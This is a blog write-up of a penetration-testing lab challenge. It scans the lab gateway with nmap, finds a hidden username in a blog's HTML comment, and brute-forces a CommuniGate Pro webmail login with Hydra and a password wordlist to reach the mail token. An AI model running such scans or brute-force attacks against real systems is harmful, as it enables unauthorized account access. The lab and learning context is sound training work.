V.10 (Part 1) – Token Mail

Categories Tutorials, Uncategorized

So this is the 1st tutorial for the 1st token that I achieved.
This was a hard fight and had to get help from different people.

Note: I must say this Token, and the next two I got before my security break, but I’m documenting here now ( Yes, lab is still live, so you still can go for it). Have fun.As usually we start by enumerating our GW:

$ sudo nmap -sV
Starting Nmap 7.25BETA2 ( ) at 2016-11-27 09:10 WAT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.00% done; ETC: 09:11 (0:00:53 remaining)
Nmap scan report for
Host is up (0.18s latency).
Not shown: 995 filtered ports
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
25/tcp   open  smtp    CommuniGate Pro mail server 6.0.9
80/tcp   open  http    nginx 1.10.1
443/tcp  open  http    nginx 1.2.1
8100/tcp open  caldav

We started by thinking that port 25 was the mail server (, but after some more enumeration and following other ports, we end up finding some pages.

  • Port 80 hosts a store (opencart).

  • Port 443 hosts a blog.

  • Port 8100 hosts… something interesting:

This is communigate pro, and here we have a login page.
At this stage we started by doing some enumeration and find possible logins.
We came to a list of 2 users (found in blog site):

Scott Locklear - s.locklear@gds.lab
Joshua Wise - j.wise@gds.lab

Running around in circles there was someone who mentioned that the username to get mail token was “hidden” in the source code of blog. And even after that I struggled to find it, after analyze it from top to botton. So r00t gave me a tip: “Batman butler”. And there it was… Alfred in the source code.

<!-- Alfred Modlin said use this template -->

So this had to be the username. So now that we had the user we just need to crack our way in.
We did some enumerationg and we came up with the directory:


Following that path we get a popup for the login session, so now its time crack some nuts 🙂
That was when Hydra came in:

#hydra -v -l a.modlin@gds.lab -P /usr/share/seclists/Passwords/john.txt http-post://
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2016-11-29 10:11:14
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3107 login tries (l:1/p:3107), ~3 tries per task
[DATA] attacking service http-post on port 8100
[VERBOSE] Resolving addresses ... done
[STATUS] 355.00 tries/min, 355 tries in 00:01h, 2752 to do in 00:08h, 16 active
[STATUS] 348.00 tries/min, 1044 tries in 00:03h, 2063 to do in 00:06h, 16 active
[8100][http-post] host:   login: a.modlin@gds.lab   password: j****o**
[STATUS] attack finished for (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2016-11-29 10:17:49

So we got our password. Now we can login.
When we login we see have 2 email drafts. And one of them is Token:

We also found another email, which has an interesting file as attachment with name gds-authenticator.apk that apparently have some connection with server (ssh-test).
We will see this on the ssh-test token.
Here is a preview:

No Comments

Leave a Reply

Your email address will not be published. Required fields are marked *